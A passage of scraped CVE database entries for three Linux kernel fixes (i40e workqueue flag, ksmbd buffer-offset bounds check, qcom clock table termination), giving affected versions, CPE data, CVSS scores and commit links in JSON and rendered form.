              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ni40e: Do not use WQ_MEM_RECLAIM flag for workqueue\n\nIssue reported by customer during SRIOV testing, call trace:\nWhen both i40e and the i40iw driver are loaded, a warning\nin check_flush_dependency is being triggered. This seems\nto be because of the i40e driver workqueue is allocated with\nthe WQ_MEM_RECLAIM flag, and the i40iw one is not.\n\nSimilar error was encountered on ice too and it was fixed by\nremoving the flag. Do the same for i40e too.\n\n[Feb 9 09:08] ------------[ cut here ]------------\n[  +0.000004] workqueue: WQ_MEM_RECLAIM i40e:i40e_service_task [i40e] is\nflushing !WQ_MEM_RECLAIM infiniband:0x0\n[  +0.000060] WARNING: CPU: 0 PID: 937 at kernel/workqueue.c:2966\ncheck_flush_dependency+0x10b/0x120\n[  +0.000007] Modules linked in: snd_seq_dummy snd_hrtimer snd_seq\nsnd_timer snd_seq_device snd soundcore nls_utf8 cifs cifs_arc4\nnls_ucs2_utils rdma_cm iw_cm ib_cm cifs_md4 dns_resolver netfs qrtr\nrfkill sunrpc vfat fat intel_rapl_msr intel_rapl_common irdma\nintel_uncore_frequency intel_uncore_frequency_common ice ipmi_ssif\nisst_if_common skx_edac nfit libnvdimm x86_pkg_temp_thermal\nintel_powerclamp gnss coretemp ib_uverbs rapl intel_cstate ib_core\niTCO_wdt iTCO_vendor_support acpi_ipmi mei_me ipmi_si intel_uncore\nioatdma i2c_i801 joydev pcspkr mei ipmi_devintf lpc_ich\nintel_pch_thermal i2c_smbus ipmi_msghandler acpi_power_meter acpi_pad\nxfs libcrc32c ast sd_mod drm_shmem_helper t10_pi drm_kms_helper sg ixgbe\ndrm i40e ahci crct10dif_pclmul libahci crc32_pclmul igb crc32c_intel\nlibata ghash_clmulni_intel i2c_algo_bit mdio dca wmi dm_mirror\ndm_region_hash dm_log dm_mod fuse\n[  +0.000050] CPU: 0 PID: 937 Comm: kworker/0:3 Kdump: loaded Not\ntainted 6.8.0-rc2-Feb-net_dev-Qiueue-00279-gbd43c5687e05 #1\n[  +0.000003] Hardware name: Intel Corporation S2600BPB/S2600BPB, BIOS\nSE5C620.86B.02.01.0013.121520200651 12/15/2020\n[  +0.000001] Workqueue: i40e i40e_service_task [i40e]\n[  +0.000024] RIP: 0010:check_flush_dependency+0x10b/0x120\n[  +0.000003] Code: ff 49 8b 54 24 18 48 8d 8b b0 00 00 00 49 89 e8 48\n81 c6 b0 00 00 00 48 c7 c7 b0 97 fa 9f c6 05 8a cc 1f 02 01 e8 35 b3 fd\nff \u003c0f\u003e 0b e9 10 ff ff ff 80 3d 78 cc 1f 02 00 75 94 e9 46 ff ff ff 90\n[  +0.000002] RSP: 0018:ffffbd294976bcf8 EFLAGS: 00010282\n[  +0.000002] RAX: 0000000000000000 RBX: ffff94d4c483c000 RCX:\n0000000000000027\n[  +0.000001] RDX: ffff94d47f620bc8 RSI: 0000000000000001 RDI:\nffff94d47f620bc0\n[  +0.000001] RBP: 0000000000000000 R08: 0000000000000000 R09:\n00000000ffff7fff\n[  +0.000001] R10: ffffbd294976bb98 R11: ffffffffa0be65e8 R12:\nffff94c5451ea180\n[  +0.000001] R13: ffff94c5ab5e8000 R14: ffff94c5c20b6e05 R15:\nffff94c5f1330ab0\n[  +0.000001] FS:  0000000000000000(0000) GS:ffff94d47f600000(0000)\nknlGS:0000000000000000\n[  +0.000002] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[  +0.000001] CR2: 00007f9e6f1fca70 CR3: 0000000038e20004 CR4:\n00000000007706f0\n[  +0.000000] DR0: 0000000000000000 DR1: 0000000000000000 DR2:\n0000000000000000\n[  +0.000001] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:\n0000000000000400\n[  +0.000001] PKRU: 55555554\n[  +0.000001] Call Trace:\n[  +0.000001]  \u003cTASK\u003e\n[  +0.000002]  ? __warn+0x80/0x130\n[  +0.000003]  ? check_flush_dependency+0x10b/0x120\n[  +0.000002]  ? report_bug+0x195/0x1a0\n[  +0.000005]  ? handle_bug+0x3c/0x70\n[  +0.000003]  ? exc_invalid_op+0x14/0x70\n[  +0.000002]  ? asm_exc_invalid_op+0x16/0x20\n[  +0.000006]  ? check_flush_dependency+0x10b/0x120\n[  +0.000002]  ? check_flush_dependency+0x10b/0x120\n[  +0.000002]  __flush_workqueue+0x126/0x3f0\n[  +0.000015]  ib_cache_cleanup_one+0x1c/0xe0 [ib_core]\n[  +0.000056]  __ib_unregister_device+0x6a/0xb0 [ib_core]\n[  +0.000023]  ib_unregister_device_and_put+0x34/0x50 [ib_core]\n[  +0.000020]  i40iw_close+0x4b/0x90 [irdma]\n[  +0.000022]  i40e_notify_client_of_netdev_close+0x54/0xc0 [i40e]\n[  +0.000035]  i40e_service_task+0x126/0x190 [i40e]\n[  +0.000024]  process_one_work+0x174/0x340\n[  +0.000003]  worker_th\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:10:19.743Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/09b54d29f05129b092f7c793a70b689ffb3c7b2c"
        },
        {
          "url": "https://git.kernel.org/stable/c/546d0fe9d76e8229a67369f9cb61e961d99038bd"
        },
        {
          "url": "https://git.kernel.org/stable/c/fbbb2404340dd6178e281bd427c271f7d5ec1d22"
        },
        {
          "url": "https://git.kernel.org/stable/c/ff7431f898dd00892a545b7d0ce7adf5b926944f"
        },
        {
          "url": "https://git.kernel.org/stable/c/152ed360cf2d273f88fc99a518b7eb868aae2939"
        },
        {
          "url": "https://git.kernel.org/stable/c/8d6105f637883c8c09825e962308c06e977de4f0"
        },
        {
          "url": "https://git.kernel.org/stable/c/1594dac8b1ed78f9e75c263327e198a2e5e25b0e"
        },
        {
          "url": "https://git.kernel.org/stable/c/2cc7d150550cc981aceedf008f5459193282425c"
        }
      ],
      "title": "i40e: Do not use WQ_MEM_RECLAIM flag for workqueue",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36004",
    "datePublished": "2024-05-20T09:48:04.926Z",
    "dateReserved": "2024-05-17T13:50:33.150Z",
    "dateUpdated": "2025-05-04T09:10:19.743Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26952 (GCVE-0-2024-26952)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:18 – Updated: 2025-11-03 21:54

Title

ksmbd: fix potencial out-of-bounds when buffer offset is invalid

Summary

In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix potencial out-of-bounds when buffer offset is invalid I found potencial out-of-bounds when buffer offset fields of a few requests is invalid. This patch set the minimum value of buffer offset field to ->Buffer offset to validate buffer length.

Severity ?

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-125 - Out-of-bounds Read

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/480469f145e5abf83…
	https://git.kernel.org/stable/c/ad6480c9a5d884e27…
	https://git.kernel.org/stable/c/39bdc4197acf2ed13…
	https://git.kernel.org/stable/c/2dcda336b6e80b72d…
	https://git.kernel.org/stable/c/0c5541b4c980626fa…
	https://git.kernel.org/stable/c/c6cd2e8d2d9aa7ee3…

Impacted products

Vendor

Product

Version

Linux

Affected: 0626e6641f6b467447c81dd7678a69c66f7746cf , < 480469f145e5abf83361e608734e421b7d99693d (git)
Affected: 0626e6641f6b467447c81dd7678a69c66f7746cf , < ad6480c9a5d884e2704adc51d69895d93339176c (git)
Affected: 0626e6641f6b467447c81dd7678a69c66f7746cf , < 39bdc4197acf2ed13269167ccf093ee28cfa2a4e (git)
Affected: 0626e6641f6b467447c81dd7678a69c66f7746cf , < 2dcda336b6e80b72d58d30d40f2fad9724e5fe63 (git)
Affected: 0626e6641f6b467447c81dd7678a69c66f7746cf , < 0c5541b4c980626fa3cab16ba1a451757778bbb5 (git)
Affected: 0626e6641f6b467447c81dd7678a69c66f7746cf , < c6cd2e8d2d9aa7ee35b1fa6a668e32a22a9753da (git)

Linux

Affected: 5.15
Unaffected: 0 , < 5.15 (semver)
Unaffected: 5.15.181 , ≤ 5.15.* (semver)
Unaffected: 6.1.119 , ≤ 6.1.* (semver)
Unaffected: 6.6.32 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "2dcda336b6e8",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 8.1,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26952",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-13T16:40:20.864151Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-125",
                "description": "CWE-125 Out-of-bounds Read",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:49:17.654Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:54:07.063Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/39bdc4197acf2ed13269167ccf093ee28cfa2a4e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2dcda336b6e80b72d58d30d40f2fad9724e5fe63"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0c5541b4c980626fa3cab16ba1a451757778bbb5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c6cd2e8d2d9aa7ee35b1fa6a668e32a22a9753da"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/server/smb2misc.c",
            "fs/smb/server/smb2pdu.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "480469f145e5abf83361e608734e421b7d99693d",
              "status": "affected",
              "version": "0626e6641f6b467447c81dd7678a69c66f7746cf",
              "versionType": "git"
            },
            {
              "lessThan": "ad6480c9a5d884e2704adc51d69895d93339176c",
              "status": "affected",
              "version": "0626e6641f6b467447c81dd7678a69c66f7746cf",
              "versionType": "git"
            },
            {
              "lessThan": "39bdc4197acf2ed13269167ccf093ee28cfa2a4e",
              "status": "affected",
              "version": "0626e6641f6b467447c81dd7678a69c66f7746cf",
              "versionType": "git"
            },
            {
              "lessThan": "2dcda336b6e80b72d58d30d40f2fad9724e5fe63",
              "status": "affected",
              "version": "0626e6641f6b467447c81dd7678a69c66f7746cf",
              "versionType": "git"
            },
            {
              "lessThan": "0c5541b4c980626fa3cab16ba1a451757778bbb5",
              "status": "affected",
              "version": "0626e6641f6b467447c81dd7678a69c66f7746cf",
              "versionType": "git"
            },
            {
              "lessThan": "c6cd2e8d2d9aa7ee35b1fa6a668e32a22a9753da",
              "status": "affected",
              "version": "0626e6641f6b467447c81dd7678a69c66f7746cf",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/server/smb2misc.c",
            "fs/smb/server/smb2pdu.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.15"
            },
            {
              "lessThan": "5.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.181",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.119",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.32",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.181",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.119",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.32",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix potencial out-of-bounds when buffer offset is invalid\n\nI found potencial out-of-bounds when buffer offset fields of a few requests\nis invalid. This patch set the minimum value of buffer offset field to\n-\u003eBuffer offset to validate buffer length."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:00:33.523Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/480469f145e5abf83361e608734e421b7d99693d"
        },
        {
          "url": "https://git.kernel.org/stable/c/ad6480c9a5d884e2704adc51d69895d93339176c"
        },
        {
          "url": "https://git.kernel.org/stable/c/39bdc4197acf2ed13269167ccf093ee28cfa2a4e"
        },
        {
          "url": "https://git.kernel.org/stable/c/2dcda336b6e80b72d58d30d40f2fad9724e5fe63"
        },
        {
          "url": "https://git.kernel.org/stable/c/0c5541b4c980626fa3cab16ba1a451757778bbb5"
        },
        {
          "url": "https://git.kernel.org/stable/c/c6cd2e8d2d9aa7ee35b1fa6a668e32a22a9753da"
        }
      ],
      "title": "ksmbd: fix potencial out-of-bounds when buffer offset is invalid",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26952",
    "datePublished": "2024-05-01T05:18:39.096Z",
    "dateReserved": "2024-02-19T14:20:24.198Z",
    "dateUpdated": "2025-11-03T21:54:07.063Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26969 (GCVE-0-2024-26969)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:19 – Updated: 2025-05-04 09:01

Title

clk: qcom: gcc-ipq8074: fix terminating of frequency table arrays

Summary

In the Linux kernel, the following vulnerability has been resolved: clk: qcom: gcc-ipq8074: fix terminating of frequency table arrays The frequency table arrays are supposed to be terminated with an empty element. Add such entry to the end of the arrays where it is missing in order to avoid possible out-of-bound access when the table is traversed by functions like qcom_find_freq() or qcom_find_freq_floor(). Only compile tested.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e117c6e2d1617520f…
	https://git.kernel.org/stable/c/83fe1bbd9e259ad10…
	https://git.kernel.org/stable/c/851cc19bdb02556fb…
	https://git.kernel.org/stable/c/9de184d4e557d550f…
	https://git.kernel.org/stable/c/dd92b159c506804ac…
	https://git.kernel.org/stable/c/b6b31b4c67ea6bd92…
	https://git.kernel.org/stable/c/fc3ac2fcd0a7fad63…
	https://git.kernel.org/stable/c/be9e2752d823eca1d…
	https://git.kernel.org/stable/c/1040ef5ed95d6fd26…

Impacted products

Vendor

Product

Version

Linux

Affected: 9607f6224b3966652ce3f4e620c4694df190b64a , < e117c6e2d1617520f5f7d7f6f6b395f01d8b5a27 (git)
Affected: 9607f6224b3966652ce3f4e620c4694df190b64a , < 83fe1bbd9e259ad109827ccfbfc2488e0dea8e94 (git)
Affected: 9607f6224b3966652ce3f4e620c4694df190b64a , < 851cc19bdb02556fb13629b3e4fef6f2bdb038fe (git)
Affected: 9607f6224b3966652ce3f4e620c4694df190b64a , < 9de184d4e557d550fb0b7b833b676bda4f269e4f (git)
Affected: 9607f6224b3966652ce3f4e620c4694df190b64a , < dd92b159c506804ac57adf3742d9728298bb1255 (git)
Affected: 9607f6224b3966652ce3f4e620c4694df190b64a , < b6b31b4c67ea6bd9222e5b73b330554c57f2f90d (git)
Affected: 9607f6224b3966652ce3f4e620c4694df190b64a , < fc3ac2fcd0a7fad63eba1b359490a4b81720d0f9 (git)
Affected: 9607f6224b3966652ce3f4e620c4694df190b64a , < be9e2752d823eca1d5af67014a1844a9176ff566 (git)
Affected: 9607f6224b3966652ce3f4e620c4694df190b64a , < 1040ef5ed95d6fd2628bad387d78a61633e09429 (git)

Linux

Affected: 4.16
Unaffected: 0 , < 4.16 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.840Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e117c6e2d1617520f5f7d7f6f6b395f01d8b5a27"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/83fe1bbd9e259ad109827ccfbfc2488e0dea8e94"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/851cc19bdb02556fb13629b3e4fef6f2bdb038fe"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9de184d4e557d550fb0b7b833b676bda4f269e4f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dd92b159c506804ac57adf3742d9728298bb1255"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b6b31b4c67ea6bd9222e5b73b330554c57f2f90d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fc3ac2fcd0a7fad63eba1b359490a4b81720d0f9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/be9e2752d823eca1d5af67014a1844a9176ff566"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1040ef5ed95d6fd2628bad387d78a61633e09429"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26969",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:45:16.629888Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:44.899Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/clk/qcom/gcc-ipq8074.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e117c6e2d1617520f5f7d7f6f6b395f01d8b5a27",
              "status": "affected",
              "version": "9607f6224b3966652ce3f4e620c4694df190b64a",
              "versionType": "git"
            },
            {
              "lessThan": "83fe1bbd9e259ad109827ccfbfc2488e0dea8e94",
              "status": "affected",
              "version": "9607f6224b3966652ce3f4e620c4694df190b64a",
              "versionType": "git"
            },
            {
              "lessThan": "851cc19bdb02556fb13629b3e4fef6f2bdb038fe",
              "status": "affected",
              "version": "9607f6224b3966652ce3f4e620c4694df190b64a",
              "versionType": "git"
            },
            {
              "lessThan": "9de184d4e557d550fb0b7b833b676bda4f269e4f",
              "status": "affected",
              "version": "9607f6224b3966652ce3f4e620c4694df190b64a",
              "versionType": "git"
            },
            {
              "lessThan": "dd92b159c506804ac57adf3742d9728298bb1255",
              "status": "affected",
              "version": "9607f6224b3966652ce3f4e620c4694df190b64a",
              "versionType": "git"
            },
            {
              "lessThan": "b6b31b4c67ea6bd9222e5b73b330554c57f2f90d",
              "status": "affected",
              "version": "9607f6224b3966652ce3f4e620c4694df190b64a",
              "versionType": "git"
            },
            {
              "lessThan": "fc3ac2fcd0a7fad63eba1b359490a4b81720d0f9",
              "status": "affected",
              "version": "9607f6224b3966652ce3f4e620c4694df190b64a",
              "versionType": "git"
            },
            {
              "lessThan": "be9e2752d823eca1d5af67014a1844a9176ff566",
              "status": "affected",
              "version": "9607f6224b3966652ce3f4e620c4694df190b64a",
              "versionType": "git"
            },
            {
              "lessThan": "1040ef5ed95d6fd2628bad387d78a61633e09429",
              "status": "affected",
              "version": "9607f6224b3966652ce3f4e620c4694df190b64a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/clk/qcom/gcc-ipq8074.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.16"
            },
            {
              "lessThan": "4.16",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
